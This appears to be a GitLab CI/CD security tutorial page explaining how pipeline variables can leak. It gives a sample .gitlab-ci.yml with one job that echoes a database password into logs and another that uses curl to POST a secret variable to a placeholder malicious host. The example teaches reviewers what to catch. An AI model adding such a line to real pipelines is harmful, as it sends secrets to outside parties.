Logo
Intro
CI/CD Fundamentals
Variables and Secrets in GitLab CI/CD Pipelines
Variables and Secrets in GitLab CI/CD Pipelines
Variable Usage in CI/CD Pipelines
Protected Variables
Masked variables
CI/CD Variable Security
Conclusion
git-vars package
Introduction to `git-vars`
Installing `git-vars` Locally
`git-vars` Configuration
Pulling Variables to Local
Pushing Variables to Local
Managing Project and Group level Environment Variables
Using Different Profiles
Role Based Access Control
Introduction to Role-Based Access Control (RBAC)
Implementing RBAC in GitLab
Best Practices for RBAC in GitLab
Conclusion
Protected Branches and Tags
Protected Branches and Tags in GitLab
Protected Branches and Tags in GitLab
Configuring Protected Branches in GitLab
Configuring Protected Tags in GitLab
Best Practices for Protected Branches and Tags
Conclusion
Security Templates
Security Templates in GitLab CI/CD
Security Templates in GitLab CI/CD
Types of Security Templates in GitLab
Auto DevOps Security Template
Secret Detection Template
Dependency Scanning Template
Static Application Security Testing (SAST) Template
Best Practices for Using Security Templates
Conclusion
Artifact Management
Advanced Artifact Management in GitLab CI/CD
Introduction to Advanced Artifact Management
Introduction to Advanced Artifact Management
Sharing and Versioning
Conclusion

CI/CD Fundamentals

CI/CD Variable Security

< >

6. CI/CD Variable Security

Code pushed to the .gitlab-ci.yml file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third-party server.

Review all merge requests that introduce changes to the .gitlab-ci.yml file before you merge the changes.

Review the .gitlab-ci.yml file of imported projects before you add files or run pipelines against them.

The following example shows malicious code in a .gitlab-ci.yml file:

accidental-leak-job: 
  script: # Password exposed accidentally 
    - echo "This script logs into the DB with $USER $PASSWORD" 
    - db-login $USER $PASSWORD 
malicious-job: 
  script: # Secret exposed maliciously 
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"

To help reduce the risk of accidentally leaking secrets through scripts like in accidental-leak-job, all variables containing sensitive information should be masked in job logs. You can also limit a variable to protected branches and tags only.

Alternatively, as mentioned before, you can use the GitLab integration with HashiCorp Vault  to store and retrieve secrets.

Malicious scripts like in malicious-job must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables.

Variable values are encrypted using aes-256-cbc  and stored in the database. This data can only be read and decrypted with a valid secrets file .